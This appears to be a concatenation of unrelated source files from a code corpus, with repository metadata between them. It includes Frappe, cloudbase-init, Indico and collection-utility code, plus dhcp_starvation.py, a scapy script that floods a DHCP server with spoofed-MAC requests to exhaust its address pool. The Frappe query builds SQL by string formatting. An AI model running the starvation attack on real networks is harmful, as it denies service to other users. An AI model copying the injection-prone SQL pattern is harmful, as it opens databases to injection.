] | 6 | 2019-08-23T18:36:26.000Z | 2019-11-12T13:12:12.000Z | spo/utils/mandat_invoice.py | libracore/spo | efff6da53a776c4483f06d9ef1acc8a7aa96b28e | [
"MIT"
] | 1 | 2021-08-14T22:22:43.000Z | 2021-08-14T22:22:43.000Z | # -*- coding: utf-8 -*-
# Copyright (c) 2019, libracore and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
@frappe.whitelist()
def get_mandat_logs(mandat):
mandat = frappe.get_doc("Mandat", mandat)
referenz_anfrage = mandat.anfragen
if referenz_anfrage:
referenz_anfrage = " OR `spo_referenz` = '{referenz_anfrage}'".format(referenz_anfrage=referenz_anfrage)
else:
referenz_anfrage = ''
logs = frappe.db.sql("""SELECT
`tabTimesheet Detail`.`hours`,
`tabTimesheet Detail`.`spo_dokument`,
`tabTimesheet Detail`.`spo_remark`,
`tabTimesheet Detail`.`from_time`,
`tabTimesheet Detail`.`owner`,
`employee` AS `employee_name`
FROM `tabTimesheet Detail`
INNER JOIN `tabEmployee` ON `tabTimesheet Detail`.`owner` = `tabEmployee`.`user_id`
WHERE
`tabTimesheet Detail`.`nicht_verrechnen` != 1
AND `tabTimesheet Detail`.`spo_referenz` = '{reference}'
OR `tabTimesheet Detail`.`spo_referenz` IN (
SELECT `name` FROM `tabAnforderung Patientendossier` WHERE `mandat` = '{reference}')
OR `tabTimesheet Detail`.`spo_referenz` IN (
SELECT `name` FROM `tabMedizinischer Bericht` WHERE `mandat` = '{reference}')
OR `tabTimesheet Detail`.`spo_referenz` IN (
SELECT `name` FROM `tabTriage` WHERE `mandat` = '{reference}')
OR `tabTimesheet Detail`.`spo_referenz` IN (
SELECT `name` FROM `tabVollmacht` WHERE `mandat` = '{reference}')
OR `tabTimesheet Detail`.`spo_referenz` IN (
SELECT `name` FROM `tabAbschlussbericht` WHERE `mandat` = '{reference}')
{referenz_anfrage}
ORDER BY `tabTimesheet Detail`.`from_time`, `tabTimesheet Detail`.`idx` ASC""".format(reference=mandat.name, referenz_anfrage=referenz_anfrage), as_dict=True)
return {
'logs': logs,
'rsv': mandat.rsv,
'rate': mandat.stundensatz
} | 59.818182 | 191 | 0.50228 | 209 | 2,632 | 6.167464 | 0.368421 | 0.223429 | 0.130334 | 0.134988 | 0.319628 | 0.319628 | 0.251358 | 0.251358 | 0.251358 | 0.251358 | 0 | 0.003805 | 0.400836 | 2,632 | 44 | 192 | 59.818182 | 0.81357 | 0.044073 | 0 | 0.128205 | 0 | 0 | 0.779757 | 0.099595 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025641 | false | 0 | 0.051282 | 0 | 0.102564 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d99b281133c5e2a0516d4d5e84a0056c5980fc1d | 71 | py | Python | aula15/programa01.py | NicoCassio/cursoemvideo-python | 2686ff74f4d45bdb0dc194f49f4dd19aae629d52 | [
"MIT"
] | null | null | null | aula15/programa01.py | NicoCassio/cursoemvideo-python | 2686ff74f4d45bdb0dc194f49f4dd19aae629d52 | [
"MIT"
] | null | null | null | aula15/programa01.py | NicoCassio/cursoemvideo-python | 2686ff74f4d45bdb0dc194f49f4dd19aae629d52 | [
"MIT"
] | null | null | null | i = 1
while True:
print(i)
i += 1
if i > 10:
break
| 10.142857 | 14 | 0.408451 | 12 | 71 | 2.416667 | 0.666667 | 0.137931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 0.478873 | 71 | 6 | 15 | 11.833333 | 0.675676 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d9b01f6045fe4f5394efddef5743f95dbd28ab38 | 3,762 | py | Python | cloudbaseinit/plugins/common/createuser.py | micumatei/cloudbase-init | 68a9ae57d453e0f59869daeadda5a80e0380ac9f | [
"Apache-2.0"
] | null | null | null | cloudbaseinit/plugins/common/createuser.py | micumatei/cloudbase-init | 68a9ae57d453e0f59869daeadda5a80e0380ac9f | [
"Apache-2.0"
] | null | null | null | cloudbaseinit/plugins/common/createuser.py | micumatei/cloudbase-init | 68a9ae57d453e0f59869daeadda5a80e0380ac9f | [
"Apache-2.0"
] | 1 | 2017-06-30T21:52:39.000Z | 2017-06-30T21:52:39.000Z | # Copyright 2012 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from oslo_log import log as oslo_logging
import six
from cloudbaseinit import conf as cloudbaseinit_conf
from cloudbaseinit.osutils import factory as osutils_factory
from cloudbaseinit.plugins.common import base
from cloudbaseinit.plugins.common import constants
CONF = cloudbaseinit_conf.CONF
LOG = oslo_logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class BaseCreateUserPlugin(base.BasePlugin):
"""This is a base class for creating or modifying an user."""
@abc.abstractmethod
def create_user(self, username, password, osutils):
"""Create a new username, with the given *username*.
This will be called by :meth:`~execute`, whenever
a new user must be created.
"""
@abc.abstractmethod
def post_create_user(self, user_name, password, osutils):
"""Executes post user creation logic.
This will be called after by :meth:`~execute`, after
the user is created or the user password is updated.
"""
@staticmethod
def _get_password(osutils):
# Generate a temporary random password to be replaced
# by SetUserPasswordPlugin (starting from Grizzly)
maximum_length = osutils.get_maximum_password_length()
return osutils.generate_random_password(maximum_length)
def execute(self, service, shared_data):
user_name = service.get_admin_username() or CONF.username
shared_data[constants.SHARED_DATA_USERNAME] = user_name
osutils = osutils_factory.get_os_utils()
password = self._get_password(osutils)
if CONF.rename_admin_user:
admin_user_name = [u for u in osutils.enum_users()
if osutils.is_builtin_admin(u)][0]
if admin_user_name.lower() != user_name.lower():
LOG.info('Renaming builtin admin user "%(admin_user_name)s" '
'to %(new_user_name)s and setting password',
{'admin_user_name': admin_user_name,
'new_user_name': user_name})
osutils.rename_user(admin_user_name, user_name)
osutils.set_user_password(user_name, password)
else:
LOG.info('"%s" is already the name of the builtin admin '
'user, skipping renaming', user_name)
elif osutils.user_exists(user_name):
LOG.info('Setting password for existing user "%s"', user_name)
osutils.set_user_password(user_name, password)
else:
LOG.info('Creating user "%s" and setting password', user_name)
self.create_user(user_name, password, osutils)
# TODO(alexpilotti): encrypt with DPAPI
shared_data[constants.SHARED_DATA_PASSWORD] = password
self.post_create_user(user_name, password, osutils)
for group_name in CONF.groups:
try:
osutils.add_user_to_local_group(user_name, group_name)
except Exception:
LOG.exception('Cannot add user to group "%s"', group_name)
return base.PLUGIN_EXECUTION_DONE, False
| 39.1875 | 78 | 0.669059 | 478 | 3,762 | 5.075314 | 0.338912 | 0.075845 | 0.032152 | 0.028442 | 0.158697 | 0.074196 | 0.046991 | 0.046991 | 0.046991 | 0.046991 | 0 | 0.003218 | 0.256512 | 3,762 | 95 | 79 | 39.6 | 0.86414 | 0.280436 | 0 | 0.117647 | 0 | 0 | 0.112338 | 0.007997 | 0 | 0 | 0 | 0.010526 | 0 | 1 | 0.078431 | false | 0.27451 | 0.137255 | 0 | 0.27451 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
d9b94090be8b44fb2a59944da1ade6c1a818b945 | 19,437 | py | Python | carriage/map.py | d2207197/maybee | bfe71b46b46d8572b8f8e01964eceb76fc1decef | [
"Apache-2.0"
] | 10 | 2018-04-09T09:59:17.000Z | 2021-09-23T05:43:09.000Z | carriage/map.py | d2207197/maybee | bfe71b46b46d8572b8f8e01964eceb76fc1decef | [
"Apache-2.0"
] | 7 | 2018-06-06T08:01:59.000Z | 2018-08-24T13:52:27.000Z | carriage/map.py | d2207197/maybee | bfe71b46b46d8572b8f8e01964eceb76fc1decef | [
"Apache-2.0"
] | 1 | 2018-06-20T03:27:58.000Z | 2018-06-20T03:27:58.000Z | import heapq
import itertools as itt
import operator as op
from collections import OrderedDict, UserDict, defaultdict
from .array import Array
from .optional import Nothing, Some
from .repr import short_repr
from .row import KeyValue, Row
from .stream import Stream
def identity(_): return _
class Map(OrderedDict):
'''A mutable dictionary enhanced with a bulk of useful methods.
'''
def items(self):
return Stream(super().items()).starmap(KeyValue)
def values(self):
return Stream(super().values())
def keys(self):
return Stream(super().keys())
def update(self, *args, **kwds):
'''Update Map from dict/iterable and ``return self``
>>> m = Map(a=3, b=4)
>>> m2 = m.update(a=5, c=3).update({'d': 2})
>>> m is m2
True
>>> m
Map({'a': 5, 'b': 4, 'c': 3, 'd': 2})
'''
super().update(*args, **kwds)
return self
def updated(self, *args, **kwds):
'''Create a new Map instance that is updated from dict/iterable.
This method is the same as ``m.copy().update(...)``
>>> m = Map(a=3, b=4)
>>> m2 = m.updated(a=5, c=3).update({'d': 2})
>>> m2
Map({'a': 5, 'b': 4, 'c': 3, 'd': 2})
>>> m
Map({'a': 3, 'b': 4})
'''
m = self.copy()
return m.update(*args, **kwds)
def join(self, *others, fillvalue=None, agg=None):
"""Create a new Map instance with keys merged and values joined.
>>> m1 = Map(a=1, b=2)
>>> m2 = m1.join(dict(a=3, b=4, c=5))
>>> m2 is m1
False
>>> m2
Map({'a': Row(f0=1, f1=3), 'b': Row(f0=2, f1=4), 'c': Row(f0=None, f1=5)})
>>> m1 = Map(a=1, b=2)
>>> m2 = m1.join(dict(a=3, b=4, c=5), agg=sum, fillvalue=0)
>>> m2
Map({'a': 4, 'b': 6, 'c': 5})
"""
return Map(self.iter_joined(*others, fillvalue=fillvalue, agg=agg))
def iter_joined(self, *others, fillvalue=None, agg=None):
"""Create a ``Row(key, Row(v0, v1, ...))`` iterator with keys from
all Maps and value joined.
>>> m = Map(a=1, b=2)
>>> l = list(m.iter_joined(
... Map(a=3, b=4, c=5),
... Map(a=6, c=7),
... fillvalue=0))
>>> l[0]
Row(key='a', values=Row(f0=1, f1=3, f2=6))
>>> l[1]
Row(key='b', values=Row(f0=2, f1=4, f2=0))
>>> l[2]
Row(key='c', values=Row(f0=0, f1=5, f2=7))
"""
if agg is None:
agg = identity
keys = list(self.keys())
keys_set = set(keys)
for other in others:
for key in other.keys():
if key not in keys_set:
keys_set.add(key)
keys.append(key)
dicts = (self,) + others
for key in keys:
yield Row(key=key,
values=agg(Row.from_values(
d.get(key, fillvalue)
for d in dicts)))
def __repr__(self):
return f'Map({self.make_string()})'
def map(self, func):
'''Create a new Map instance that each key, value pair is derived by
applying function to original key, value.
>>> Map(a=3, b=4).map(lambda k, v: (v, k))
Map({3: 'a', 4: 'b'})
Parameters
----------
func : ``pred(key, value) -> (key, value)``
function for computing new key/value pair
'''
return Map(func(key, value) for key, value in self.items())
def map_keys(self, func):
'''Create a new Map instance that all values remains the same,
while each corresponding key is updated by applying function to
original key, value.
>>> Map(a=3, b=4).map_keys(lambda k, v: k + '_1')
Map({'a_1': 3, 'b_1': 4})
Parameters
----------
func : ``pred(key, value) -> key``
function for computing new keys
'''
return Map((func(key, value), value) for key, value in self.items())
def map_values(self, func):
'''Create a new Map instance that all keys remains the same,
while each corresponding value is updated by applying function to
original key, value.
>>> Map(a=3, b=4).map_values(lambda k, v: v * 2)
Map({'a': 6, 'b': 8})
Parameters
----------
func : ``pred(key, value) -> value``
function for computing new values
'''
return Map((key, func(key, value)) for key, value in self.items())
def revamp_values(self, func):
'''Update values of current Map and return self.
Each value is derived by computing the function using
both key and value.
>>> m = Map(a=3, b=4)
>>> m.revamp_values(lambda k, v: v * 2)
Map({'a': 6, 'b': 8})
>>> m
Map({'a': 6, 'b': 8})
Parameters
----------
func : ``pred(key, value) -> value``
function for computing new values
Returns
-------
self
'''
for key, value in self.items():
self[key] = func(key, value)
return self
def keep(self, *keys):
'''Delete keys not specified and return self
>>> m = Map(a=3, b=4, c=5)
>>> m.keep('a', 'c')
Map({'a': 3, 'c': 5})
>>> m
Map({'a': 3, 'c': 5})
Returns
-------
self
'''
keys = set(keys)
current_keys = set(self.keys())
keys_to_delete = current_keys - keys
for key, in keys_to_delete:
del self[key]
return self
def project(self, *keys):
'''Create a new Map instance contains only specified keys.
>>> m = Map(a=3, b=4, c=5)
>>> m.project('a', 'c')
Map({'a': 3, 'c': 5})
>>> m
Map({'a': 3, 'b': 4, 'c': 5})
Returns
-------
Map[key, value]
'''
return Map((k, self[k]) for k in keys)
def get_opt(self, key):
'''Get the value of specified key as Optional type.
Return Some(value) if key exists, otherwise return Nothing.
>>> m = Map(a=3, b=4)
>>> m.get_opt('a')
Some(3)
>>> m.get_opt('c')
Nothing
>>> m.get_opt('a').map(lambda v: v * 2)
Some(6)
>>> m.get_opt('c').map(lambda v: v * 2)
Nothing
Returns
-------
Optional[value]
'''
if key in self:
return Some(self[key])
return Nothing
def remove(self, *keys):
'''Delete keys and return self
>>> m = Map(a=3, b=4, c=5)
>>> m.remove('a', 'c')
Map({'b': 4})
>>> m
Map({'b': 4})
Returns
-------
self
'''
for key in keys:
del self[key]
return self
def without(self, *keys):
'''Create a new Map instance with those keys
>>> m = Map(a=3, b=4, c=6)
>>> m.without('a', 'c')
Map({'b': 4})
>>> m
Map({'a': 3, 'b': 4, 'c': 6})
Returns
-------
Map[key, value]
'''
return Map((key, value)
for key, value in self.items()
if key not in keys)
def retain(self, pred):
'''Delete key/value pairs not satisfying the predicate and return self
>>> m = Map(a=3, b=4, c=5)
>>> m.retain(lambda k, v: k == 'b' or v == 5)
Map({'b': 4, 'c': 5})
>>> m
Map({'b': 4, 'c': 5})
Parameters
----------
pred : ``(k, v) -> bool``
Returns
-------
self
'''
keys_to_delete = []
for key, value in self.items():
if not pred(key, value):
keys_to_delete.append(key)
return self.remove(*keys_to_delete)
def retain_false(self, pred):
'''Delete key/value pairs satisfying the predicate and return self
>>> m = Map(a=3, b=4, c=5)
>>> m.retain_false(lambda k, v: k == 'b' or v == 5)
Map({'a': 3})
>>> m
Map({'a': 3})
Parameters
----------
pred : ``(k, v) -> bool``
Returns
-------
self
'''
keys_to_delete = []
for key, value in self.items():
if pred(key, value):
keys_to_delete.append(key)
return self.remove(*keys_to_delete)
def retain_by_key(self, pred):
'''Delete key/value pairs not satisfying the predicate and return self
>>> m = Map(a=3, b=4, c=5)
>>> m.retain_by_key(lambda k: k == 'b')
Map({'b': 4})
>>> m
Map({'b': 4})
Parameters
----------
pred : ``(k) -> bool``
Returns
-------
self
'''
keys_to_delete = []
for key, value in self.items():
if not pred(key):
keys_to_delete.append(key)
return self.remove(*keys_to_delete)
def retain_by_value(self, pred):
'''Delete key/value pairs not satisfying the predicate and return self
>>> m = Map(a=3, b=4, c=5)
>>> m.retain_by_value(lambda v: v == 4)
Map({'b': 4})
>>> m
Map({'b': 4})
Parameters
----------
pred : ``(k) -> bool``
Returns
-------
self
'''
keys_to_delete = []
for key, value in self.items():
if not pred(value):
keys_to_delete.append(key)
return self.remove(*keys_to_delete)
def filter(self, pred):
'''Create a new Map with key/value pairs satisfying the predicate
>>> m = Map({1: 2, 2: 4, 3: 6})
>>> m2 = m.filter(lambda k, v: (v-k) % 3 == 0)
>>> m2
Map({3: 6})
Parameters
----------
pred : ``(k, v) -> bool``
predicate
Returns
-------
Map[key, value]
'''
return Map((k, v) for k, v in self.items() if pred(k, v))
def filter_false(self, pred):
'''Create a new Map with key/value pairs not satisfying the predicate
>>> m = Map({1: 2, 2: 4, 3: 6})
>>> m2 = m.filter_false(lambda k, v: (v-k) % 3 == 0)
>>> m2
Map({1: 2, 2: 4})
Parameters
----------
pred : ``(k, v) -> bool``
predicate
Returns
-------
Map[key, value]
'''
return Map((k, v) for k, v in self.items() if not pred(k, v))
def filter_by_key(self, pred):
'''Create a new Map with keys satisfying the predicate
>>> m = Map({1: 2, 2: 4, 3: 6})
>>> m2 = m.filter_by_key(lambda k: k % 3 == 0)
>>> m2
Map({3: 6})
Parameters
----------
pred : ``(k, v) -> bool``
predicate
Returns
-------
Map[key, value]
'''
return Map((k, v) for k, v in self.items() if pred(k))
def filter_by_value(self, pred):
'''Create a new Map with values satisfying the predicate
>>> m = Map({1: 2, 2: 4, 3: 6})
>>> m2 = m.filter_by_value(lambda v: v % 3 == 0)
>>> m2
Map({3: 6})
Parameters
----------
pred : ``(k, v) -> bool``
predicate
Returns
-------
Map[key, value]
'''
return Map((k, v) for k, v in self.items() if pred(v))
def group_by(self, key_func):
'''Group key/value pairs into nested Maps.
>>> Map(a=3, b=4, c=5).group_by(lambda k, v: v % 2)
Map({1: Map({'a': 3, 'c': 5}), 0: Map({'b': 4})})
Parameters
----------
key_func : ``(key, value) -> group_key``
predicate
Returns
-------
Map[key_func(key), Map[key, value]]
'''
grouped_d = defaultdict(Map)
for key, value in self.items():
grouped_d[key_func(key, value)][key] = value
return Map(grouped_d)
def reduce(self, key):
pass
def make_string(self,
key_value_format='{key!r}: {value!r}',
start='{', item_sep=', ', end='}'):
'''Construct a string from key/values.
>>> m = Map(a=3, b=4, c=5)
>>> m.make_string()
"{'a': 3, 'b': 4, 'c': 5}"
>>> m.make_string(start='(', key_value_format='{key}={value!r}',
... item_sep=', ', end=')')
'(a=3, b=4, c=5)'
Parameters
----------
key_value_format : str
string template using builtin ``str.format()`` for formatting
key/value pairs. Default to ``'{key!r}: {value!r}'``.
Available named placeholders: ``{key}``, ``{value}``
start : str
Default to ``'{'``.
item_sep : str
Default to ``', '``
end : str
Default to ``}``
Returns
-------
str
'''
items_str = item_sep.join(
key_value_format.format(key=key, value=value)
for key, value in self.items())
return start + items_str + end
def take(self, n):
'''create a Stream instance of first ``n`` ``Row(key, value)`` elements.
>>> m = Map(a=4, b=5, c=6, d=7)
>>> m.take(2).to_list()
[Row(key='a', value=4), Row(key='b', value=5)]
Returns
-------
Stream[Row[key, value]]
'''
return self.to_stream().take(n)
def first(self):
'''Get the first item in ``Row(key, value)`` type
>>> m = Map(a=4, b=5, c=6, d=7)
>>> m.first()
Row(key='a', value=4)
>>> m.first().key
'a'
>>> m.first().value
4
>>> m = Map()
>>> m.first()
Traceback (most recent call last):
...
IndexError: index out of range.
Returns
-------
Row[key, value]
'''
return self.nth(0)
def first_opt(self):
'''Optionally get the first item.
Return Some(Row(key, value)) if first item exists,
otherwise return Nothing
>>> m = Map(a=4, b=5, c=6, d=7)
>>> m.first_opt().map(lambda kv: kv.transform(value=lambda v: v * 2))
Some(Row(key='a', value=8))
>>> m.first_opt().map(lambda kv: kv.value)
Some(4)
>>> m = Map()
>>> m.first_opt()
Nothing
Returns
-------
Optional[Row[key, value]]
'''
return self.nth_opt(0)
def nth(self, index):
'''Get the nth item in ``Row(key, value)`` type.
>>> m = Map(a=4, b=5, c=6, d=7)
>>> m.nth(2)
Row(key='c', value=6)
>>> m = Map(a=4, b=5)
>>> m.nth(2)
Traceback (most recent call last):
...
IndexError: index out of range.
Returns
-------
Row[key, value]
'''
try:
key, value = next(itt.islice(self.items(), index, None))
return KeyValue(key, value)
except StopIteration:
raise IndexError('index out of range.')
def nth_opt(self, index):
'''Optionally get the nth item.
Return ``Some(Row(key, value))`` if first item exists,
otherwise return Nothing.
>>> m = Map(a=4, b=5, c=6, d=7)
>>> m.first_opt().map(lambda kv: kv.transform(value=lambda v: v * 2))
Some(Row(key='a', value=8))
>>> m = Map()
>>> m.first_opt()
Nothing
Returns
-------
Optional[Row[key, value]]
'''
try:
return Some(self.nth(index))
except IndexError:
return Nothing
def len(self):
'''Get the length of this Map
>>> m = Map(a=4, b=5, c=6, d=7)
>>> m.len()
4
Returns
-------
int
'''
return len(self)
def to_stream(self, key_field='key', value_field='value'):
'''Convert to a Stream instance of ``Row(key, value)`` iterable.
>>> m = Map(a=4, b=5, c=6, d=7)
>>> m.to_stream().take(2).to_list()
[Row(key='a', value=4), Row(key='b', value=5)]
Returns
-------
Stream[Row[key, value]]
'''
return (Stream(super().items())
.starmap(lambda key, value:
Row(**{key_field: key, value_field: value})))
def to_array(self):
'''Convert to an Array instance of ``Row(key, value)`` iterable.
>>> m = Map(a=4, b=5, c=6, d=7)
>>> m.to_array().take(2)
Array([Row(key='a', value=4), Row(key='b', value=5)])
Returns
-------
Array[Row[key, value]]
'''
return self.to_stream().to_array()
def to_list(self):
'''Convert to an list instance of ``Row(key, value)`` iterable.
>>> m = Map(a=4, b=5)
>>> m.to_list()
[Row(key='a', value=4), Row(key='b', value=5)]
Returns
-------
Array[Row[key, value]]
'''
return self.to_stream().to_list()
def to_dict(self):
'''Convert to dict'''
return dict(self)
def flip(self):
'''Create a new Map which key/value pairs are fliped
>>> m = Map(a=4, b=5, c=6)
>>> m.flip()
Map({4: 'a', 5: 'b', 6: 'c'})
'''
return Map((value, key) for key, value in self.items())
def for_each(self, func):
'''Call func for each key/value pair
>>> m = Map(a=[], b=[], c=[])
>>> m.for_each(lambda k, v: v.append(k))
>>> m
Map({'a': ['a'], 'b': ['b'], 'c': ['c']})
'''
for k, v in self.items():
func(k, v)
def for_each_key(self, func):
'''Call func for each key
>>> m = Map(a=[], b=[], c=[])
>>> keys = []
>>> m.for_each_key(lambda k: keys.append(k))
>>> keys
['a', 'b', 'c']
'''
for k in self.keys():
func(k)
def for_each_value(self, func):
'''Call func for each value
>>> m = Map(a=[], b=[], c=[])
>>> m.for_each_value(lambda v: v.append(3))
>>> m
Map({'a': [3], 'b': [3], 'c': [3]})
'''
for v in self.values():
func(v)
def nlargest_value_items(self, n=None):
'''Get top n largest values
>>> m = Map(a=6, b=2, c=10, d=9)
>>> m.nlargest_value_items(n=2)
Array([Row(key='c', value=10), Row(key='d', value=9)])
Returns
-------
Array[Row[key, value]]
'''
if n is None:
vs = sorted(self.items(), key=op.itemgetter(1), reverse=True)
vs = heapq.nlargest(n, self.items(), key=op.itemgetter(1))
return Array(vs)
def nsmallest_value_items(self, n=None):
'''Get top n smallest values
>>> m = Map(a=6, b=2, c=10, d=9)
>>> m.nsmallest_value_items(n=2)
Array([Row(key='b', value=2), Row(key='a', value=6)])
Returns
-------
Array[Row[key, value]]
'''
if n is None:
vs = sorted(self.items(), key=op.itemgetter(1), reverse=False)
vs = heapq.nsmallest(n, self.items(), key=op.itemgetter(1))
return Array(vs)
| 25.676354 | 82 | 0.456243 | 2,582 | 19,437 | 3.376452 | 0.084818 | 0.072494 | 0.022368 | 0.011471 | 0.587176 | 0.543014 | 0.489791 | 0.441156 | 0.409612 | 0.374857 | 0 | 0.026725 | 0.364717 | 19,437 | 756 | 83 | 25.710317 | 0.6793 | 0.48845 | 0 | 0.2 | 0 | 0 | 0.011138 | 0.003763 | 0 | 0 | 0 | 0 | 0 | 1 | 0.264706 | false | 0.005882 | 0.052941 | 0.029412 | 0.564706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
d9cda095792354d7154784dc55b6bba5f5eb7ad8 | 53 | py | Python | src/titiler/mosaic/titiler/mosaic/version.py | mackdelany/titiler | b2a76185d96af9aa8b653fd8134bbaa591d637a5 | [
"MIT"
] | null | null | null | src/titiler/mosaic/titiler/mosaic/version.py | mackdelany/titiler | b2a76185d96af9aa8b653fd8134bbaa591d637a5 | [
"MIT"
] | null | null | null | src/titiler/mosaic/titiler/mosaic/version.py | mackdelany/titiler | b2a76185d96af9aa8b653fd8134bbaa591d637a5 | [
"MIT"
] | null | null | null | """titiler.mosaic version."""
__version__ = "0.3.4"
| 13.25 | 29 | 0.641509 | 7 | 53 | 4.285714 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.06383 | 0.113208 | 53 | 3 | 30 | 17.666667 | 0.574468 | 0.433962 | 0 | 0 | 0 | 0 | 0.208333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d9dcc60eb4f19996fd212171e3b48a11bacc7e0e | 2,629 | py | Python | dhcp_starvation.py | Nuve17/BadSquirrel | bbe61785e12c6633f09853fd05d6cf6936925800 | [
"Apache-2.0"
] | 2 | 2018-06-19T15:31:19.000Z | 2018-07-03T12:35:08.000Z | dhcp_starvation.py | Nuve17/BadSquirrel | bbe61785e12c6633f09853fd05d6cf6936925800 | [
"Apache-2.0"
] | null | null | null | dhcp_starvation.py | Nuve17/BadSquirrel | bbe61785e12c6633f09853fd05d6cf6936925800 | [
"Apache-2.0"
] | null | null | null | from scapy.all import *
from time import sleep
from threading import Thread
class DHCPStarvation(object):
def __init__(self):
# Generated MAC stored to avoid same MAC requesting for different IP
self.mac = [""]
# Requested IP stored to identify registered IP
self.ip = []
def handle_dhcp(self, pkt):
if pkt[DHCP]:
# if DHCP server reply ACK, the IP address requested is registered
# 10.10.111.107 is IP for bt5, not to be starved
if pkt[DHCP].options[0][1]==5 and pkt[IP].dst != "192.168.100.1":
self.ip.append(pkt[IP].dst)
print str(pkt[IP].dst)+" registered"
# Duplicate ACK may happen due to packet loss
elif pkt[DHCP].options[0][1]==6:
print "NAK received"
def listen(self):
# sniff DHCP packets
sniff(filter="udp and (port 67 or port 68)",
prn=self.handle_dhcp,
store=0)
def start(self):
# start packet listening thread
thread = Thread(target=self.listen)
thread.start()
print "Starting DHCP starvation..."
# Keep starving until all 100 targets are registered
# 100~200 excepts 107 = 100
while len(self.ip) < 100: self.starve()
print "Targeted IP address starved"
def starve(self):
for i in range(0,11):
# don't request 10.10.111.107
#if i == 7: continue
# generate IP we want to request
# if IP already registered, then skip
requested_addr = "10.0.2."+str(55+i)
if requested_addr in self.ip:
continue
# generate MAC, avoid duplication
src_mac = ""
while src_mac in self.mac:
src_mac = RandMAC()
self.mac.append(src_mac)
# generate DHCP request packet
pkt = Ether(src=src_mac, dst="ff:ff:ff:ff:ff:ff")
pkt /= IP(src="0.0.0.0", dst="255.255.255.255")
pkt /= UDP(sport=68, dport=67)
pkt /= BOOTP(chaddr=RandString(12, "0123456789abcdef"))
pkt /= DHCP(options=[("message-type", "request"),
("requested_addr", requested_addr),
("server_id", "10.0.2.15"),
"end"])
sendp(pkt, iface="vboxnet0",verbose=0)
print "Trying to occupy "+requested_addr
sleep(0.2) # interval to avoid congestion and packet loss
def start_starvation():
starvation = DHCPStarvation()
starvation.start()
| 40.446154 | 78 | 0.548117 | 333 | 2,629 | 4.273273 | 0.411411 | 0.045678 | 0.016866 | 0.016866 | 0.030921 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065041 | 0.344998 | 2,629 | 64 | 79 | 41.078125 | 0.761324 | 0.233549 | 0 | 0 | 1 | 0 | 0.12963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.06383 | null | null | 0.106383 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d9e78173f5e7262d0fa6aa2283aa0ab2a12945a8 | 624 | py | Python | indico/modules/news/views.py | jgrigera/indico | b5538f2755bc38a02313d079bac831ee3dfb44ab | [
"MIT"
] | 1 | 2018-11-12T21:29:26.000Z | 2018-11-12T21:29:26.000Z | indico/modules/news/views.py | jgrigera/indico | b5538f2755bc38a02313d079bac831ee3dfb44ab | [
"MIT"
] | 9 | 2020-09-08T09:25:57.000Z | 2022-01-13T02:59:05.000Z | indico/modules/news/views.py | jgrigera/indico | b5538f2755bc38a02313d079bac831ee3dfb44ab | [
"MIT"
] | 3 | 2020-07-20T09:09:44.000Z | 2020-10-19T00:29:49.000Z | # This file is part of Indico.
# Copyright (C) 2002 - 2020 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from __future__ import unicode_literals
from indico.modules.admin.views import WPAdmin
from indico.util.i18n import _
from indico.web.views import WPDecorated, WPJinjaMixin
class WPNews(WPJinjaMixin, WPDecorated):
template_prefix = 'news/'
title = _('News')
def _get_body(self, params):
return self._get_page_content(params)
class WPManageNews(WPAdmin):
template_prefix = 'news/'
